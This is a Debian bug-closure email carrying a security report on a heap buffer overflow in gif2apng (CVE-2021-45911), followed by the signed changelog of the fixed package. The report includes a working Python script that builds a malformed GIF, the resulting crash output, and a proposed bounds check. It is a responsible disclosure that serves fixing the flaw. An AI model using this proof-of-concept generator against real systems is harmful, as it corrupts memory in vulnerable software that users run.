Your message dated Sun, 14 Aug 2022 15:47:09 +0000 with message-id <[email protected]> and subject line Bug#1002687: fixed in gif2apng 1.9+srconly-3+deb11u1 has caused the Debian Bug report #1002687, regarding gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [email protected] immediately.) -- 1002687: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002687 Debian Bug Tracking System Contact [email protected] with problems
--- Begin Message ---Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows: delays = (unsigned short *)malloc(frames*2); if (delays == NULL) return 1; [...] if (val == 0xF9) { if (fread(&size, 1, 1, f1) != 1) return 1; if (fread(&flags, 1, 1, f1) != 1) return 1; if (fread(&delay, 2, 1, f1) != 1) return 1; if (fread(&t, 1, 1, f1) != 1) return 1; if (fread(&end, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1) delays[n] = delay; } The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer. The following script generates a poc.gif file, that should cause a crash: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") sig = b"GIF87a" w = b"\x10\x00" h = b"\x10\x00" flags_one = b"\x00" bcolor = b"\x01" aspect = b"\x01" data = sig + w + h + flags_one + bcolor + aspect f.write(data) # Writting more frames to produce crash: for i in range(0,28): # Going into the id 0x2c path, so that there is a frame id = b"\x2c" w0 = b"\x01\x00" y0 = b"\x00\x00" x0 = b"\x00\x00" h0 = b"\x01\x00" # Getting past our own size checks flags_two = b"\x00" data = id + x0 + y0 + w0 + h0 + flags_two f.write(data) # DecodeLZW mincode = b"\x07" f.write(mincode) for i in range(0,512): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) # Leaving function target_char = b"\x00" f.write(target_char) # Triggering the vulnerable code path id = b"\x21" val = b"\xf9" size = b"\xff" flags_two = b"\x00" delay = b"\xff\xff" t = b"\x00" end = b"\x00" data = id + val + size + flags_two + delay + t + end f.write(data) # Breaking out of while loop f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") f.close() The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 28 frames. Writing 'poc.png'... 28 frames. munmap_chunk(): invalid pointer Abgebrochen This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer. I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code: if (val == 0xF9) { if (fread(&size, 1, 1, f1) != 1) return 1; if (fread(&flags, 1, 1, f1) != 1) return 1; if (fread(&delay, 2, 1, f1) != 1) return 1; if (fread(&t, 1, 1, f1) != 1) return 1; if (fread(&end, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1 && n < frames) { delays[n] = delay; } } This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages gif2apng depends on: ii libc6 2.28-10 ii libzopfli1 1.0.2-1 ii zlib1g 1:1.2.11.dfsg-1 gif2apng recommends no packages. Versions of packages gif2apng suggests: pn apng2gif <none> -- no debconf information
--- End Message ---
--- Begin Message ---Source: gif2apng Source-Version: 1.9+srconly-3+deb11u1 Done: Håvard F. Aasen <[email protected]> We believe that the bug you reported is fixed in the latest version of gif2apng, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Håvard F. Aasen <[email protected]> (supplier of updated gif2apng package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Thu, 28 Jul 2022 23:21:32 +0200 Source: gif2apng Architecture: source Version: 1.9+srconly-3+deb11u1 Distribution: bullseye Urgency: medium Maintainer: Debian QA Group <[email protected]> Changed-By: Håvard F. Aasen <[email protected]> Closes: 1002667 1002668 1002687 Changes: gif2apng (1.9+srconly-3+deb11u1) bullseye; urgency=medium . * Non-maintainer upload. * CVE-2021-45909, Closes: #1002668: heap based buffer overflow in the DecodeLZW * CVE-2021-45910, Closes: #1002667: heap-based buffer overflow within the main function * CVE-2021-45911, Closes: #1002687: heap based buffer overflow in processing of delays in the main function Checksums-Sha1: 33e3f54d215b550b3db7baa5659af8016671a2cc 1976 gif2apng_1.9+srconly-3+deb11u1.dsc 55b70a112416a5409ffc82e40ee4b6be5c05c75f 8972 gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz 9e79488104d6a0a994ccf69118cd04aa669c246c 5845 gif2apng_1.9+srconly-3+deb11u1_source.buildinfo Checksums-Sha256: 65826fa4e6786d220a42bf9fd611149bd93a977d2b0f63ff72c1b7f4c4477704 1976 gif2apng_1.9+srconly-3+deb11u1.dsc 753476fd86ef70c12cbcfe0fbe828e692a12eb9f5467c6e87ab323b9337c8a78 8972 gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz 55188a21369a197ad21a9d26a8df1c83491b85df94df520b4614e0b0e24d3148 5845 gif2apng_1.9+srconly-3+deb11u1_source.buildinfo Files: 716545a1210a0702c2a2c3d3f297db46 1976 graphics optional gif2apng_1.9+srconly-3+deb11u1.dsc 54a67e604f7d352314a6bce97ff7b655 8972 graphics optional gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz e0d7b9ec1cc824ea68c615bac183c848 5845 graphics optional gif2apng_1.9+srconly-3+deb11u1_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAmLvty4ACgkQweDZLphv fH4gGBAA1z8shxzMrvlXOPNKtgij5Ggfb4Z64QzsebHcwK+pg0xvfAFv+yp18+oa 2nnZ3pTskWOOQ8fDoUl2FjTjTO1cXVp1EuZsty4diT4ndjDry+o5lHWNvasW7y+X iIUoZbHOUshDSEF8ss1ihjMugijMR90tcRlX5rEuKvdRBhyLUYxFvuoQllSsIkdS IPfvPAiCrn24m4slFHfsLLoQUMJS71On+IEjeGMGMf5vJAhokrgBDhzIgziXhc3t hZSs/l0i2nGIuB9CmEQuHTbThBskCYEXoATeupYY6s3icPgBBC3F3lzykqiXaIsz v3/nosv2CC1ljr+VPHRt3PhGszjYBw2VMcObV0SWsdeMP/7cKPxoKg8g83Kc8dLR NgxwVdKdL+f14JRAZ+NrayxJknbC1GN5XC2P4ocwoJAEfiSq2cfoyHLVyIq6gwS4 ONkthyUhmJBlWl8xjE+WrgANqYCJRxmb6cZ8Rb47lWrhnRMVbWTkp/l2WRUvQuKj wsMRqMf661870Vu431KjtFA2JAmcMx1aSiZu1QRHqzDJZ3FzY5aa2RIVfnYvk5vj P9X8jpxELSihY8p6rZxYTspi9E4BibINTNODhLkfcrop2PGwas1iJkWRSP8pGv2Q Ljz+r6fh1AL1KFyoSd27vWV1310PSezojyjQRuasPteQv7QQAxU= =/CM4 -----END PGP SIGNATURE-----
--- End Message ---
